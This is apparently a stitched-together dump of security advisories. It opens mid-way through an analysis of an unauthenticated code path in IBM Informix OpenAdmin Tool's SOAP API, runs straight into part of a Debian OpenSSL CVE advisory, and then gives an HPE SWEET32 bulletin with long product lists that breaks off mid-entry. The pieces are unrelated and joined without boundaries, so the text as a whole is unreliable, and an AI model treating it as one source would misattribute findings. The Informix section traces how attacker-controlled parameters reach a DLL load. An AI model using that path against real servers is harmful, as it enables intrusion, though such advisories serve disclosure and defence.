[..] // turn of caching of the wsdl for now. $ini = ini_set("soap.wsdl_cache_enabled","0"); // load our actual server. require_once("adminapiServer.php"); //create our soapserver. $server = new SoapServer("adminapi.wsdl"); $server->setClass("adminapiServer"); if (isset($HTTP_RAW_POST_DATA)) { $request = $HTTP_RAW_POST_DATA; } else { $request = file_get_contents('php://input'); } //error_log($request); //error_log(var_export($server,true)); $server->handle($request); ?> ... There is no check before handling request. Letas look into the createSBSpace() method from C:\Program Files (x86)\IBM Informix Software Bundle\OAT\Apache_2.2.22\htdocs\openadmin\services\adminapi\adminapiServer.php ... function createSBSpace( $connectionObj,$dbsname,$path,$size,$offset ,$mpath="",$moffset="" ) { if (!dbsname) { throw new SoapFault("createSBSpace","missing param dbsname"); } if (!path) { throw new SoapFault("createSBSpace","missing param path"); } if (!size) { throw new SoapFault("createSBSpace","missing param size"); } if (!offset) { throw new SoapFault("createSBSpace","missing param offset"); } $qry = "execute function ".ADMIN_API_FUNCTION." ('create sbspace' "; $qry .= ",'{$dbsname}'"; $qry .= ",'{$path}'"; $qry .= ",'{$size}'"; $qry .= ",'{$offset}'"; if ( $mpath ) { $qry .= ",'{$mpath}'"; if ( $moffset ) { $qry .= ",'{$moffset}'"; } } $qry .= ")"; return $this->doDatabaseWork($connectionObj,$qry); <----------------------- [1] } // end createSBSpace ... at [1] doDatabaseWork() is called with a controlled $connectionObj parameter ... /** * doDatabaseWork * connectionObj = the connection details. * qry = the query to execute */ function doDatabaseWork($connectionObj,$qry) { require_once("soapdb.php"); $host = $connectionObj->host; $port = $connectionObj->port; $servername = $connectionObj->servername; $user = $connectionObj->user; $pass = $connectionObj->password; $protocol = $connectionObj->protocol; $dbname = "sysadmin"; $db = new soapdb($host,$port,$servername,$protocol,$dbname,$user,$pass); <-------------------------------- [2] $stmt = $db->query($qry); while ($row = $stmt->fetch() ) { $ret = implode("|",$row); } return $ret; } // end doDatabaseWork ... At [2] the asoapdba class is instantiated with controlled parameters __construct() method from C:\Program Files (x86)\IBM Informix Software Bundle\OAT\Apache_2.2.22\htdocs\openadmin\services\adminapi\soapdb.php ... /* function __construct * constructor */ function __construct($host,$port,$servername,$protocol="onsoctcp",$dbname="sysmaster",$user="",$passwd="") { #$persist = array( PDO::ATTR_PERSISTENT => false); $persist = array( PDO::ATTR_PERSISTENT => true); putenv("INFORMIXCONTIME=3"); putenv("INFORMIXCONRETRY=1"); $informixdir= getenv("INFORMIXDIR"); $dsn = <<<EOF informix:host={$host};service={$port};database={$dbname};server={$servername};protocol={$protocol}; <------------------------------ [3] EOF; try { parent::__construct($dsn,$user,utf8_decode($passwd),$persist); <---------------------------- [4] } catch(PDOException $e) { throw new SoapFault("Connection Failed:","DSN:{$dsn} ERROR:{$e->getMessage()}"); } } #end ___construct ... at [3] a connection string is concatenated with user-controlled parameters at [4] PDO::__construct() is called, then the dll is loaded by the Apache process. Additional information can be found at https://www.openssl.org/blog/blog/2016/06/27/undefined-pointer-arithmetic/ CVE-2016-2178 Cesar Pereida, Billy Brumley and Yuval Yarom discovered a timing leak in the DSA code. CVE-2016-2179 / CVE-2016-2181 Quan Luo and the OCAP audit team discovered denial of service vulnerabilities in DTLS. CVE-2016-2180 / CVE-2016-2182 / CVE-2016-6303 Shi Lei discovered an out-of-bounds memory read in TS_OBJ_print_bio() and an out-of-bounds write in BN_bn2dec() and MDC2_Update(). CVE-2016-2183 DES-based cipher suites are demoted from the HIGH group to MEDIUM as a mitigation for the SWEET32 attack. CVE-2016-6302 Shi Lei discovered that the use of SHA512 in TLS session tickets is susceptible to denial of service. CVE-2016-6304 Shi Lei discovered that excessively large OCSP status request may result in denial of service via memory exhaustion. CVE-2016-6306 Shi Lei discovered that missing message length validation when parsing certificates may potentially result in denial of service. For the stable distribution (jessie), these problems have been fixed in version 1.0.1t-1+deb8u4. For the unstable distribution (sid), these problems will be fixed soon. We recommend that you upgrade your openssl packages. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Note: the current version of the following document is available here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05349499 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c05349499 Version: 1 HPSBHF03674 rev.1 HPE Comware 5 and Comware 7 Network Products using SSL/TLS, Remote Disclosure of Information NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2016-12-06 Last Updated: 2016-12-06 Potential Security Impact: Remote: Disclosure of Information Source: Hewlett Packard Enterprise, Product Security Response Team VULNERABILITY SUMMARY A potential security vulnerability in the DES/3DES block ciphers could potentially impact HPE Comware 5 and Comware 7 network products using SSL/TLS. This vulnerability could be exploited remotely resulting in disclosure of information. References: - CVE-2016-2183 - "SWEET32" attack SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. - Comware 5 (CW5) Products All versions - Please refer to the RESOLUTION below for a list of impacted products. - Comware 7 (CW7) Products All versions - Please refer to the RESOLUTION below for a list of impacted products. BACKGROUND CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector CVE-2016-2183 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N) Information on CVSS is documented in HPE Customer Notice HPSN-2008-002 here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499 RESOLUTION HPE has released the following mitigation information to resolve the vulnerability in HPE Comware 5 and Comware 7 network products. *Note:* Please contact HPE Technical Support for assistance configuring the recommended settings. **Mitigation for the DES/3DES vulnerabilities:** HPE recommends using the assl server-policya and/or the assl client-policya command to specify which ciphers to negotiate. + For Comware V7, do not include the following DES/3DES ciphers: - exp_rsa_des_cbc_sha - rsa_3des_ede_cbc_sha - rsa_des_cbc_sha + For Comware V5, do not include the following DES/3DES ciphers: - rsa_3des_ede_cbc_sha - rsa_des_cbc_sha using the assl server-policya and/or the assl client-policya command. Refer to the *Security Command Reference* manual and *Release notes* for the specific version running on the device for details. **COMWARE 5 Products** + **A6600 (Comware 5) - Version: See Mitigation** * HP Network Products - JC165A HP 6600 RPE-X1 Router Module - JC177A HP 6608 Router - JC177B HP 6608 Router Chassis - JC178A HP 6604 Router Chassis - JC178B HP 6604 Router Chassis - JC496A HP 6616 Router Chassis - JC566A HP 6600 RSE-X1 Router Main Processing Unit - JG780A HP 6600 RSE-X1 TAA-compliant Main Processing Unit - JG781A HP 6600 RPE-X1 TAA-compliant Main Processing Unit + **HSR6602 (Comware 5) - Version: See Mitigation** * HP Network Products - JC176A HP 6602 Router Chassis - JG353A HP HSR6602-G Router - JG354A HP HSR6602-XG Router - JG355A HP 6600 MCP-X1 Router Main Processing Unit - JG356A HP 6600 MCP-X2 Router Main Processing Unit - JG776A HP HSR6602-G TAA-compliant Router - JG777A HP HSR6602-XG TAA-compliant Router - JG778A HP 6600 MCP-X2 Router TAA-compliant Main Processing Unit + **HSR6800 (Comware 5) - Version: See Mitigation** * HP Network Products - JG361A HP HSR6802 Router Chassis - JG361B HP HSR6802 Router Chassis - JG362A HP HSR6804 Router Chassis - JG362B HP HSR6804 Router Chassis - JG363A HP HSR6808 Router Chassis - JG363B HP HSR6808 Router Chassis - JG364A HP HSR6800 RSE-X2 Router Main Processing Unit - JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing Unit + **MSR20 (Comware 5) - Version: See Mitigation** * HP Network Products - JD432A HP A-MSR20-21 Router - JD662A HP MSR20-20 Router - JD663A HP A-MSR20-21 Router - JD663B HP MSR20-21 Router - JD664A HP MSR20-40 Router - JF228A HP MSR20-40 Router - JF283A HP MSR20-20 Router + **MSR20-1X (Comware 5) - Version: See Mitigation** * HP Network Products - JD431A HP MSR20-10 Router - JD667A HP MSR20-15 IW Multi-Service Router - JD668A HP MSR20-13 Multi-Service Router - JD669A HP MSR20-13 W Multi-Service Router - JD670A HP MSR20-15 A Multi-Service Router - JD671A HP MSR20-15 AW Multi-Service Router - JD672A HP MSR20-15 I Multi-Service Router - JD673A HP MSR20-11 Multi-Service Router - JD674A HP MSR20-12 Multi-Service Router - JD675A HP MSR20-12 W Multi-Service Router - JD676A HP MSR20-12 T1 Multi-Service Router - JF236A HP MSR20-15-I Router - JF237A HP MSR20-15-A Router - JF238A HP MSR20-15-I-W Router - JF239A HP MSR20-11 Router - JF240A HP MSR20-13 Router - JF241A HP MSR20-12 Router - JF806A HP MSR20-12-T Router - JF807A HP MSR20-12-W Router - JF808A HP MSR20-13-W Router - JF809A HP MSR20-15-A-W Router - JF817A HP MSR20-15 Router - JG209A HP MSR20-12-T-W Router (NA) - JG210A HP MSR20-13-W Router (NA) + **MSR 30 (Comware 5) - Version: See Mitigation** * HP Network Products - JD654A HP MSR30-60 POE Multi-Service Router - JD657A HP MSR30-40 Multi-Service Router - JD658A HP MSR30-60 Multi-Service Router - JD660A HP MSR30-20 POE Multi-Service Router - JD661A HP MSR30-40 POE Multi-Service Router - JD666A HP MSR30-20 Multi-Service Router - JF229A HP MSR30-40 Router - JF230A HP MSR30-60 Router - JF232A HP RTMSR3040-AC-OVSAS-H3 - JF235A HP MSR30-20 DC Router - JF284A HP MSR30-20 Router - JF287A HP MSR30-40 DC Router - JF801A HP MSR30-60 DC Router - JF802A HP MSR30-20 PoE Router - JF803A HP MSR30-40 PoE Router - JF804A HP MSR30-60 PoE Router - JG728A HP MSR30-20 TAA-compliant DC Router - JG729A HP MSR30-20 TAA-compliant Router + **MSR 30-16 (Comware 5) - Version: See Mitigation** * HP Network Products - JD659A HP MSR30-16 POE Multi-Service Router - JD665A HP MSR30-16 Multi-Service Router - JF233A HP MSR30-16 Router - JF234A HP MSR30-16 PoE Router + **MSR 30-1X (Comware 5) - Version: See Mitigation** * HP Network Products - JF800A HP MSR30-11 Router - JF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr - JG182A HP MSR30-11E Router - JG183A HP MSR30-11F Router - JG184A HP MSR30-10 DC Router + **MSR 50 (Comware 5) - Version: See Mitigation** * HP Network Products - JD433A HP MSR50-40 Router - JD653A HP MSR50 Processor Module - JD655A HP MSR50-40 Multi-Service Router - JD656A HP MSR50-60 Multi-Service Router - JF231A HP MSR50-60 Router - JF285A HP MSR50-40 DC Router - JF640A HP MSR50-60 Rtr Chassis w DC PwrSupply + **MSR 50-G2 (Comware 5) - Version: See Mitigation** * HP Network Products - JD429A HP MSR50 G2 Processor Module - JD429B HP MSR50 G2 Processor Module + **MSR 9XX (Comware 5) - Version: See Mitigation** * HP Network Products - JF812A HP MSR900 Router - JF813A HP MSR920 Router - JF814A HP MSR900-W Router - JF815A HP MSR920 2FEWAN/8FELAN/.11 b/g Rtr - JG207A HP MSR900-W Router (NA) - JG208A HP MSR920-W Router (NA) + **MSR 93X (Comware 5) - Version: See Mitigation** * HP Network Products - JG511A HP MSR930 Router - JG511B HP MSR930 Router - JG512A HP MSR930 Wireless Router - JG513A HP MSR930 3G Router - JG513B HP MSR930 3G Router - JG514A HP MSR931 Router - JG514B HP MSR931 Router - JG515A HP MSR931 3G Router - JG516A HP MSR933 Router - JG517A HP MSR933 3G Router - JG518A HP MSR935 Router - JG518B HP MSR935 Router - JG519A HP MSR935 Wireless Router - JG520A HP MSR935 3G Router - JG531A HP MSR931 Dual 3G Router - JG531B HP MSR931 Dual 3G Router - JG596A HP MSR930 4G LTE/3G CDMA Router - JG597A HP MSR936 Wireless Router - JG665A HP MSR930 4G LTE/3G WCDMA Global Router - JG704A HP MSR930 4G LTE/3G WCDMA ATT Router - JH009A HP MSR931 Serial (TI) Router - JH010A HP MSR933 G.SHDSL (TI) Router - JH011A HP MSR935 ADSL2+ (TI) Router - JH012A HP MSR930 Wireless 802.11n (NA) Router - JH012B HP MSR930 Wireless 802.11n (NA) Router - JH013A HP MSR935 Wireless 802.11n (NA) Router + **MSR1000 (Comware 5) - Version: See Mitigation** * HP Network Products - JG732A HP MSR1003-8 AC Router + **12500 (Comware 5) - Version: See Mitigation** * HP Network Products - JC072B HP 12500 Main Processing Unit - JC085A HP A12518 Switch Chassis - JC086A HP A12508 Switch Chassis - JC652A HP 12508 DC Switch Chassis - JC653A HP 12518 DC Switch Chassis - JC654A HP 12504 AC Switch Chassis - JC655A HP 12504 DC Switch Chassis - JC808A HP 12500 TAA Main Processing Unit - JF430A HP A12518 Switch Chassis - JF430B HP 12518 Switch Chassis - JF430C HP 12518 AC Switch Chassis - JF431A HP A12508 Switch Chassis - JF431B HP 12508 Switch Chassis - JF431C HP 12508 AC Switch Chassis + **9500E (Comware 5) - Version: See Mitigation** * HP Network Products - JC124A HP A9508 Switch Chassis - JC124B HP 9505 Switch Chassis - JC125A HP A9512 Switch Chassis - JC125B HP 9512 Switch Chassis - JC474A HP A9508-V Switch Chassis - JC474B HP 9508-V Switch Chassis + **10500 (Comware 5) - Version: See Mitigation** * HP Network Products - JC611A HP 10508-V Switch Chassis - JC612A HP 10508 Switch Chassis - JC613A HP 10504 Switch Chassis - JC614A HP 10500 Main Processing Unit - JC748A HP 10512 Switch Chassis - JG375A HP 10500 TAA-compliant Main Processing Unit - JG820A HP 10504 TAA-compliant Switch Chassis - JG821A HP 10508 TAA-compliant Switch Chassis - JG822A HP 10508-V TAA-compliant Switch Chassis - JG823A HP 10512 TAA-compliant Switch Chassis + **7500 (Comware 5) - Version: See Mitigation** * HP Network Products - JC666A HP 7503-S 144Gbps Fabric/MPU with PoE Upgradable 20-port Gig-T/4-port GbE Combo - JC697A HP 7502 TAA-compliant Main Processing Unit - JC698A HP 7503-S 144Gbps TAA Fabric / MPU with 16 GbE SFP Ports and 8 GbE Combo Ports - JC699A HP 7500 384Gbps TAA-compliant Fabric / MPU with 2 10GbE XFP Ports - JC700A HP 7500 384Gbps TAA-compliant Fabric / Main Processing Unit - JC701A HP 7500 768Gbps TAA-compliant Fabric / Main Processing Unit - JD193A HP 7500 384Gbps Fabric Module with 2 XFP Ports - JD193B HP 7500 384Gbps Fabric Module with 2 XFP Ports - JD194A HP 7500 384Gbps Fabric Module - JD194B HP 7500 384Gbps Fabric Module - JD195A HP 7500 384Gbps Advanced Fabric Module - JD196A HP 7502 Fabric Module - JD220A HP 7500 768Gbps Fabric Module - JD224A HP 7500 384Gbps Fabric Module with 12 SFP Ports - JD238A HP 7510 Switch Chassis - JD238B HP 7510 Switch Chassis - JD239A HP 7506 Switch Chassis - JD239B HP 7506 Switch Chassis - JD240A HP 7503 Switch Chassis - JD240B HP 7503 Switch Chassis - JD241A HP 7506-V Switch Chassis - JD241B HP 7506-V Switch Chassis - JD242A HP 7502 Switch Chassis - JD242B HP 7502 Switch Chassis - JD243A HP 7503-S Switch Chassis with 1 Fabric Slot - JD243B HP 7503-S Switch Chassis with 1 Fabric Slot - JE164A HP E7902 Switch Chassis - JE165A HP E7903 Switch Chassis - JE166A HP E7903 1 Fabric Slot Switch Chassis - JE167A HP E7906 Switch Chassis - JE168A HP E7906 Vertical Switch Chassis - JE169A HP E7910 Switch Chassis + **6125G/XG Blade Switch - Version: See Mitigation** * HP Network Products - 737220-B21 HP 6125G Blade Switch with TAA - 737226-B21 HP 6125G/XG Blade Switch with TAA - 658250-B21 HP 6125G/XG Blade Switch Opt Kit - 658247-B21 HP 6125G Blade Switch Opt Kit + **5830 (Comware 5) - Version: See Mitigation** * HP Network Products - JC691A HP 5830AF-48G Switch with 1 Interface Slot - JC694A HP 5830AF-96G Switch - JG316A HP 5830AF-48G TAA-compliant Switch w/1 Interface Slot - JG374A HP 5830AF-96G TAA-compliant Switch + **5800 (Comware 5) - Version: See Mitigation** * HP Network Products - JC099A HP 5800-24G-PoE Switch - JC099B HP 5800-24G-PoE+ Switch - JC100A HP 5800-24G Switch - JC100B HP 5800-24G Switch - JC101A HP 5800-48G Switch with 2 Slots - JC101B HP 5800-48G-PoE+ Switch with 2 Interface Slots - JC103A HP 5800-24G-SFP Switch - JC103B HP 5800-24G-SFP Switch with 1 Interface Slot - JC104A HP 5800-48G-PoE Switch - JC104B HP 5800-48G-PoE+ Switch with 1 Interface Slot - JC105A HP 5800-48G Switch - JC105B HP 5800-48G Switch with 1 Interface Slot - JG254A HP 5800-24G-PoE+ TAA-compliant Switch - JG254B HP 5800-24G-PoE+ TAA-compliant Switch - JG255A HP 5800-24G TAA-compliant Switch - JG255B HP 5800-24G TAA-compliant Switch - JG256A HP 5800-24G-SFP TAA-compliant Switch with 1 Interface Slot - JG256B HP 5800-24G-SFP TAA-compliant Switch with 1 Interface Slot - JG257A HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface Slot - JG257B HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface Slot - JG258A HP 5800-48G TAA-compliant Switch with 1 Interface Slot - JG258B HP 5800-48G TAA-compliant Switch with 1 Interface Slot - JG225A HP 5800AF-48G Switch - JG225B HP 5800AF-48G Switch - JG242A HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface Slots - JG242B HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface - JG243A HP 5820-24XG-SFP+ TAA-compliant Switch - JG243B HP 5820-24XG-SFP+ TAA-compliant Switch - JG259A HP 5820X-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots & 1 OAA Slot - JG259B HP 5820-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots and 1 OAA Slot - JC106A HP 5820-14XG-SFP+ Switch with 2 Slots - JC106B HP 5820-14XG-SFP+ Switch with 2 Interface Slots & 1 OAA Slot - JG219A HP 5820AF-24XG Switch - JG219B HP 5820AF-24XG Switch - JC102A HP 5820-24XG-SFP+ Switch - JC102B HP 5820-24XG-SFP+ Switch + **5500 HI (Comware 5) - Version: See Mitigation** * HP Network Products - JG311A HP 5500-24G-4SFP HI Switch with 2 Interface Slots - JG312A HP 5500-48G-4SFP HI Switch with 2 Interface Slots - JG541A HP 5500-24G-PoE+-4SFP HI Switch with 2 Interface Slots - JG542A HP 5500-48G-PoE+-4SFP HI Switch with 2 Interface Slots - JG543A HP 5500-24G-SFP HI Switch with 2 Interface Slots - JG679A HP 5500-24G-PoE+-4SFP HI TAA-compliant Switch with 2 Interface Slots - JG680A HP 5500-48G-PoE+-4SFP HI TAA-compliant Switch with 2 Interface Slots - JG681A HP 5500-24G-SFP HI TAA-compliant Switch with 2 Interface Slots + **5500 EI (Comware 5) - Version: See Mitigation** * HP Network Products - JD373A HP 5500-24G DC EI Switch - JD374A HP 5500-24G-SFP EI Switch - JD375A HP 5500-48G EI Switch - JD376A HP 5500-48G-PoE EI Switch - JD377A HP 5500-24G EI Switch - JD378A HP 5500-24G-PoE EI Switch - JD379A HP 5500-24G-SFP DC EI Switch - JG240A HP 5500-48G-PoE+ EI Switch with 2 Interface Slots - JG241A HP 5500-24G-PoE+ EI Switch with 2 Interface Slots - JG249A HP 5500-24G-SFP EI TAA-compliant Switch with 2 Interface - JG250A HP 5500-24G EI TAA-compliant Switch with 2 Interface Slots - JG251A HP 5500-48G EI TAA-compliant Switch with 2 Interface Slots - JG252A HP 5500-24G-PoE+ EI TAA-compliant Switch with 2 Interface Slots - JG253A HP 5500-48G-PoE+ EI TAA-compliant Switch with 2 Interface Slots + **4800G (Comware 5) - Version: See Mitigation** * HP Network Products - JD007A HP 4800-24G Switch - JD008A HP 4800-24G-PoE Switch - JD009A HP 4800-24G-SFP Switch - JD010A HP 4800-48G Switch - JD011A HP 4800-48G-PoE Switch + **5500SI (Comware 5) - Version: See Mitigation** * HP Network Products - JD369A HP 5500-24G SI Switch - JD370A HP 5500-48G SI Switch - JD371A HP 5500-24G-PoE SI Switch - JD372A HP 5500-48G-PoE SI Switch - JG238A HP 5500-24G-PoE+ SI Switch with 2 Interface Slots - JG239A HP 5500-48G-PoE+ SI Switch with 2 Interface Slots + **4500G (Comware 5) - Version: See Mitigation** * HP Network Products - JF428A HP 4510-48G Switch - JF847A HP 4510-24G Switch + **5120 EI (Comware 5) - Version: See Mitigation** * HP Network Products - JE066A HP 5120-24G EI Switch - JE067A HP 5120-48G EI Switch - JE068A HP 5120-24G EI Switch with 2 Interface Slots - JE069A HP 5120-48G EI Switch with 2 Interface Slots - JE070A HP 5120-24G-PoE EI 2-slot Switch - JE071A HP 5120-48G-PoE EI 2-slot Switch - JG236A HP 5120-24G-PoE+ EI Switch with 2 Interface Slots - JG237A HP 5120-48G-PoE+ EI Switch with 2 Interface Slots - JG245A HP 5120-24G EI TAA-compliant Switch with 2 Interface Slots - JG246A HP 5120-48G EI TAA-compliant Switch with 2 Interface Slots - JG247A HP 5120-24G-PoE+ EI TAA-compliant Switch with 2 Slots - JG248A HP 5120-48G-PoE+ EI TAA-compliant Switch with 2 Slots + **4210G (Comware 5) - Version: See Mitigation** * HP Network Products - JF844A HP 4210-24G Switch - JF845A HP 4210-48G Switch - JF846A HP 4210-24G-PoE Switch + **5120 SI (Comware 5) - Version: See Mitigation** * HP Network Products - JE072A HP 5120-48G SI Switch - JE072B HPE 5120 48G SI Switch - JE073A HP 5120-16G SI Switch - JE073B HPE 5120 16G SI Switch - JE074A HP 5120-24G SI Switch - JE074B HPE 5120 24G SI Switch - JG091A HP 5120-24G-PoE+ (370W) SI Switch - JG091B HPE 5120 24G PoE+ (370W) SI Switch - JG092A HP 5120-24G-PoE+ (170W) SI Switch - JG309B HPE 5120 8G PoE+ (180W) SI Switch - JG310B HPE 5120 8G PoE+ (65W) SI Switch + **3610 (Comware 5) - Version: See Mitigation** * HP Network Products - JD335A HP 3610-48 Switch - JD336A HP 3610-24-4G-SFP Switch - JD337A HP 3610-24-2G-2G-SFP Switch - JD338A HP 3610-24-SFP Switch + **3600V2 (Comware 5) - Version: See Mitigation** * HP Network Products - JG299A HP 3600-24 v2 EI Switch - JG299B HP 3600-24 v2 EI Switch - JG300A HP 3600-48 v2 EI Switch - JG300B HP 3600-48 v2 EI Switch - JG301A HP 3600-24-PoE+ v2 EI Switch - JG301B HP 3600-24-PoE+ v2 EI Switch - JG301C HP 3600-24-PoE+ v2 EI Switch - JG302A HP 3600-48-PoE+ v2 EI Switch - JG302B HP 3600-48-PoE+ v2 EI Switch - JG302C HP 3600-48-PoE+ v2 EI Switch - JG303A HP 3600-24-SFP v2 EI Switch - JG303B HP 3600-24-SFP v2 EI Switch - JG304A HP 3600-24 v2 SI Switch - JG304B HP 3600-24 v2 SI Switch - JG305A HP 3600-48 v2 SI Switch - JG305B HP 3600-48 v2 SI Switch - JG306A HP 3600-24-PoE+ v2 SI Switch - JG306B HP 3600-24-PoE+ v2 SI Switch - JG306C HP 3600-24-PoE+ v2 SI Switch - JG307A HP 3600-48-PoE+ v2 SI Switch - JG307B HP 3600-48-PoE+ v2 SI Switch - JG307C HP 3600-48-PoE+ v2 SI Switch + **3100V2-48 (Comware 5) - Version: See Mitigation** * HP Network Products - JG315A HP 3100-48 v2 Switch - JG315B HP 3100-48 v2 Switch + **HP870 (Comware 5) - Version: See Mitigation** * HP Network Products - JG723A HP 870 Unified Wired-WLAN Appliance - JG725A HP 870 Unified Wired-WLAN TAA-compliant Appliance + **HP850 (Comware 5) - Version: See Mitigation** * HP Network Products - JG722A HP 850 Unified Wired-WLAN Appliance - JG724A HP 850 Unified Wired-WLAN TAA-compliant Appliance + **HP830 (Comware 5) - Version: See Mitigation** * HP Network Products - JG640A HP 830 24-Port PoE+ Unified Wired-WLAN Switch - JG641A HP 830 8-port PoE+ Unified Wired-WLAN Switch - JG646A HP 830 24-Port PoE+ Unified Wired-WLAN TAA-compliant Switch - JG647A HP 830 8-Port PoE+ Unified Wired-WLAN TAA-compliant + **HP6000 (Comware 5) - Version: See Mitigation** * HP Network Products - JG639A HP 10500/7500 20G Unified Wired-WLAN Module - JG645A HP 10500/7500 20G Unified Wired-WLAN TAA-compliant Module + **WX5004-EI (Comware 5) - Version: See Mitigation** * HP Network Products - JD447B HP WX5002 Access Controller - JD448A HP WX5004 Access Controller - JD448B HP WX5004 Access Controller - JD469A HP WX5004 Access Controller + **SecBlade FW (Comware 5) - Version: See Mitigation** * HP Network Products - JC635A HP 12500 VPN Firewall Module - JD245A HP 9500 VPN Firewall Module - JD249A HP 10500/7500 Advanced VPN Firewall Module - JD250A HP 6600 Firewall Processing Router Module - JD251A HP 8800 Firewall Processing Module - JD255A HP 5820 VPN Firewall Module + **F1000-E (Comware 5) - Version: See Mitigation** * HP Network Products - JD272A HP F1000-E VPN Firewall Appliance + **F1000-A-EI (Comware 5) - Version: See Mitigation** * HP Network Products - JG214A HP F1000-A-EI VPN Firewall Appliance + **F1000-S-EI (Comware 5) - Version: See Mitigation** * HP Network Products - JG213A HP F1000-S-EI VPN Firewall Appliance + **F5000-A (Comware 5) - Version: See Mitigation** * HP Network Products - JD259A HP A5000-A5 VPN Firewall Chassis - JG215A HP F5000 Firewall Main Processing Unit - JG216A HP F5000 Firewall Standalone Chassis + **U200S and CS (Comware 5) - Version: See Mitigation** * HP Network Products - JD273A HP U200-S UTM Appliance + **U200A and M (Comware 5) - Version: See Mitigation** * HP Network Products - JD275A HP U200-A UTM Appliance + **F5000-C/S (Comware 5) - Version: See Mitigation** * HP Network Products - JG650A HP F5000-C VPN Firewall Appliance - JG370A HP F5000-S VPN Firewall Appliance + **SecBlade III (Comware 5) - Version: See Mitigation** * HP Network Products - JG371A HP 12500 20Gbps VPN Firewall Module - JG372A HP 10500/11900/7500 20Gbps VPN Firewall Module + **6600 RSE RU (Comware 5 Low Encryption SW) - Version: See Mitigation** * HP Network Products - JC177A HP 6608 Router - JC177B HP 6608 Router Chassis - JC178A HP 6604 Router Chassis - JC178B HP 6604 Router Chassis - JC496A HP 6616 Router Chassis - JC566A HP 6600 RSE-X1 Router Main Processing Unit - JG780A HP 6600 RSE-X1 TAA-compliant Main Processing Unit + **6600 RPE RU (Comware 5 Low Encryption SW) - Version: See Mitigation** * HP Network Products - JC165A) HP 6600 RPE-X1 Router Module - JG781A) HP 6600 RPE-X1 TAA-compliant Main Processing Unit + **6602 RU (Comware 5 Low Encryption SW) - Version: See Mitigation** * HP Network Products - JC176A) HP 6602 Router Chassis + **HSR6602 RU (Comware 5 Low Encryption SW) - Version: See Mitigation** * HP Network Products - JC177A HP 6608 Router - JC177B HP 6608 Router Chassis - JC178A HP 6604 Router Chassis - JC178B HP 6604 Router Chassis - JC496A HP 6616 Router Chassis - JG353A HP HSR6602-G Router - JG354A HP HSR6602-XG Router - JG355A HP 6600 MCP-X1 Router Main Processing Unit - JG356A HP 6600 MCP-X2 Router Main Processing Unit - JG776A HP HSR6602-G TAA-compliant Router - JG777A HP HSR6602-XG TAA-compliant Router - JG778A HP 6600 MCP-X2 Router TAA-compliant Main Processing Unit + **HSR6800 RU (Comware 5 Low Encryption SW) - Version: See Mitigation** * HP Network Products - JG361A HP HSR6802 Router Chassis - JG361B HP HSR6802 Router Chassis - JG362A HP HSR6804 Router Chassis - JG362B HP HSR6804 Router Chassis - JG363A HP HSR6808 Router Chassis - JG363B HP HSR6808 Router Chassis - JG364A HP HSR6800 RSE-X2 Router Main Processing Unit - JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing Unit + **SMB1910 (Comware 5) - Version: See Mitigation** * HP Network Products - JG540A HP 1910-48 Switch - JG539A HP 1910-24-PoE+ Switch - JG538A HP 1910-24 Switch - JG537A HP 1910-8 -PoE+ Switch - JG536A HP 1910-8 Switch + **SMB1920 (Comware 5) - Version: See Mitigation** * HP Network Products - JG928A HP 1920-48G-PoE+ (370W) Switch - JG927A HP 1920-48G Switch - JG926A HP 1920-24G-PoE+ (370W) Switch - JG925A HP 1920-24G-PoE+ (180W) Switch - JG924A HP 1920-24G Switch - JG923A HP 1920-16G Switch - JG922A HP 1920-8G-PoE+ (180W) Switch - JG921A HP 1920-8G-PoE+ (65W) Switch - JG920A HP 1920-8G Switch + **V1910 (Comware 5) - Version: See Mitigation** * HP Network Products - JE005A HP 1910-16G Switch - JE006A HP 1910-24G Switch - JE007A HP 1910-24G-PoE (365W) Switch - JE008A HP 1910-24G-PoE(170W) Switch - JE009A HP 1910-48G Switch - JG348A HP 1910-8G Switch - JG349A HP 1910-8G-PoE+ (65W) Switch - JG350A HP 1910-8G-PoE+ (180W) Switch + **SMB 1620 (Comware 5) - Version: See Mitigation** * HP Network Products - JG914A HP 1620-48G Switch - JG913A HP 1620-24G Switch - JG912A HP 1620-8G Switch **COMWARE 7 Products** + **12500 (Comware 7) - Version: See Mitigation** * HP Network Products - JC072B HP 12500 Main Processing Unit - JC085A HP A12518 Switch Chassis - JC086A HP A12508 Switch Chassis - JC652A HP 12508 DC Switch Chassis - JC653A HP 12518 DC Switch Chassis - JC654A HP 12504 AC Switch Chassis - JC655A HP 12504 DC Switch Chassis - JF430A HP A12518 Switch Chassis - JF430B HP 12518 Switch Chassis - JF430C HP 12518 AC Switch Chassis - JF431A HP A12508 Switch Chassis - JF431B HP 12508 Switch Chassis - JF431C HP 12508 AC Switch Chassis - JG497A HP 12500 MPU w/Comware V7 OS - JG782A HP FF 12508E AC Switch Chassis - JG783A HP FF 12508E DC Switch Chassis - JG784A HP FF 12518E AC Switch Chassis - JG785A HP FF 12518E DC Switch Chassis - JG802A HP FF 12500E MPU + **10500 (Comware 7) - Version: See Mitigation** * HP Network Products - JC611A HP 10508-V Switch Chassis - JC612A HP 10508 Switch Chassis - JC613A HP 10504 Switch Chassis - JC748A HP 10512 Switch Chassis - JG608A HP FlexFabric 11908-V Switch Chassis - JG609A HP FlexFabric 11900 Main Processing Unit - JG820A HP 10504 TAA Switch Chassis - JG821A HP 10508 TAA Switch Chassis - JG822A HP 10508-V TAA Switch Chassis - JG823A HP 10512 TAA Switch Chassis - JG496A HP 10500 Type A MPU w/Comware v7 OS - JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating System - JH206A HP 10500 Type D 